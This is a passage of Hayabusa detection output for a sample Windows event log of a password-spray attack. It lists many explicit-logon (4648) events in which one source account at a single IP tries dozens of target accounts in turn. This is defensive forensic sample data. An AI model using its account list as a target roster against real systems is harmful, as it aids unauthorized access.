172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:34.067 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:35.146 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:36.239 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:37.334 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:38.403 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:39.463 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:40.530 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:41.608 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:42.669 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:43.731 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:44.801 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:45.880 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:46.969 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:48.042 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:49.108 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:50.156 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:51.239 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:52.302 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:53.366 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:54.441 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:55.503 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:56.579 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:57.650 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:58.722 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:59.800 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:00.872 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:01.934 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:02.995 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:04.075 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:05.156 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:06.238 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:07.308 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:08.370 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:09.433 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:10.523 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:11.590 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:12.649 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:13.722 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:14.787 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:15.846 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:16.940 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:18.019 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:19.076 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:20.162 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:21.257 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:22.327 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:23.410 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:24.477 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:25.557 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:26.628 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:27.690 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:28.763 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:29.837 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:30.921 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:31.996 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:33.058 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:34.138 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:35.199 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:36.266 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:37.375 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:38.439 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:39.499 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:40.560 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:41.637 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:42.734 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:43.795 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:44.875 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:45.951 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:47.017 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:48.096 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:49.176 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:50.264 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:51.340 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:52.405 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:53.466 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:54.572 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:55.671 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:56.741 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:57.817 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:58.894 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:59.965 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:01.026 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig 